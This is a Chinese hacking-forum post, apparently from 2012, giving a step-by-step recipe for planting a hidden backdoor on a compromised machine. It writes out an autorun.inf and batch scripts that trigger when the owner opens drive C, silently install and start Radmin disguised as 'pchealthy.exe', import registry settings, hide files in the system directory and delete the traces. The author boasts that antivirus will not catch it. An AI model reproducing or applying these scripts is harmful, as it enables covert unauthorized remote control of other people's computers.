|
|
入侵网站后全自动安装后门条件,只要你有上传的权限。
一共三个文件
1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件)
思路:全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。
第一文件带动运行第二文件。同时第二运行第三
运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了
《此法针对没有权限运行安全的入侵活动》
制作:
[autorun]
open=shell.bat
这个是autorun.inf
@echo off
hao.exe
c:\windows\explorer c:\
del autorun.inf
del rad.exe
del shell.bat
这个是shell.bat
hao.exe 里面包含admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件《关键所在》
r.bat--》批处理做法
@echo off
@pchealthy.exe /install /silence
@regedit /s admin.reg
@net start r_server
@del admin.reg
@del r.bat
其他四个就是Radmin的文件。这个大家都会,复制过来就行
OK,我们再来看自解压的处理,在解压路径里我们用
%systemroot%\system32,就是解压到系统目录里
并且 “解压后运行”填上我们的r.bat文件!
因为这里的文件比较多,比较隐蔽
解压模式我们选 “全部隐藏”,和 “覆盖所有文件”!
好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!
大家不要放在文件夹里压缩哦,要直接选上admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件压缩
您正在看的文章来自IT者社区 http://bbs.itzhe.org,原文地址:http://bbs.itzhe.org/read-htm-tid-15275.html
|
|
发表于 2012-6-16 00:01:12
